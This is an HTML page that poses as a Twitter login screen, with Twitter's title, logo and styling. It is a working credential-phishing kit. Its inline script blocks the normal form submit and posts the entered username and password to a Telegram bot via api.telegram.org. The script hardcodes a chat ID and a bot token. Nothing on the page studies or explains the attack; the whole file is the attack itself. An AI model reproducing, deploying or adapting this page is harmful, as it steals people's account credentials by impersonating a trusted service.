<html>
<head>
	<title>Log in to Twitter</title>
	<link rel="icon" href="twitter_logo.png">
	<style>
		body {
			margin: 0;
			padding: 0;
			background-color: #fafafa;
			font-family: sans-serif;
		}

		.container {
			display: flex;
			flex-direction: column;
			align-items: center;
			justify-content: center;
			height: 100vh;
		}

		.logo {
			margin-bottom: 20px;
			margin-left: 110px;
			width: 170px;
			height: 60px;
			background-image: url("twitter_logo.png");
			background-repeat: no-repeat;
			background-size: contain;
			text-indent: -9999px;
		}

		form {
			display: flex;
			flex-direction: column;
			align-items: center;
			background-color: white;
			padding: 30px;
			border-radius: 5px;
			box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
			width: 350px;
		}

		.input-container {
			position: relative;
			width: 100%;
		}

		input[type="text"],
		input[type="password"] {
			width: 100%;
			padding: 10px;
			border: none;
			border-radius: 5px;
			margin: 10px 0;
			font-size: 16px;
			box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
			background-color: #fafafa;
		}

		input[type="text"]:focus,
		input[type="password"]:focus {
			outline: none;
		}

		.label-placeholder {
			position: absolute;
			top: 50%;
			left: 10px;
			transform: translateY(-50%);
			pointer-events: none;
			font-size: 16px;
			color: #999;
			transition: all 0.2s ease;
		}

		input[type="text"]:focus ~ .label-placeholder,
		input[type="password"]:focus ~ .label-placeholder,
		input[type="text"]:valid ~ .label-placeholder,
		input[type="password"]:valid ~ .label-placeholder {
			font-size: 12px;
			transform: translateY(-140%);
			color: #666;
		}

		input[type="submit"],
		button {
			width: 100%;
			padding: 10px;
			border: none;
			border-radius: 5px;
			margin: 10px 0;
			font-size: 16px;
			background-color: #3897f0;
			color: white;
			cursor: pointer;
		}

		input[type="submit"]:hover,
		button:hover {
			background-color: #3182ce;
		}
	</style>
</head>
<body>
	<div class="container">
		<div class="logo">Twitter</div>
		<form id='my-form'>
			<h2> Login to Twitter</h2>
			<div class="input-container">
				<input id='username' type="text" required>
				<label class="label-placeholder" for="username">Phone, email or username</label>
			</div>
			<div class="input-container">
				<input id='password' type="password" required>
				<label class="label-placeholder" for="password">Password</label>
			</div>
			<input type="submit" value="Login">
			<span>Don’t have an account? <a href="#" style="color: #3897f0;; text-decoration: underline;">Sign up</a></span>

		</form>

		<script>
			const form = document.getElementById('my-form');

			form.addEventListener('submit', (event) => {
				event.preventDefault();

				const chatId = '5993770269';
				const botToken = '6154509077:AAHV0JFBm64wGOX53e7-tUusLd4dJ4GFFSU';
				const formData = new FormData(form);

				const xhr = new XMLHttpRequest();
				xhr.open('POST', `https://api.telegram.org/bot${botToken}/sendMessage`);
				xhr.setRequestHeader('Content-Type', 'application/json');

				xhr.onload = () => {
					if (xhr.status === 200) {
						console.log(xhr.responseText);
					} else {
						console.error(xhr.statusText);
					}
				};

				xhr.onerror = () => {
					console.error('Network error');
				};

				const data = {
					chat_id: chatId,
					text: `Username: ${document.getElementById('username').value}\nPassword: ${document.getElementById('password').value}`
				};

				xhr.send(JSON.stringify(data));
			});
		</script>
	</body>
</html>

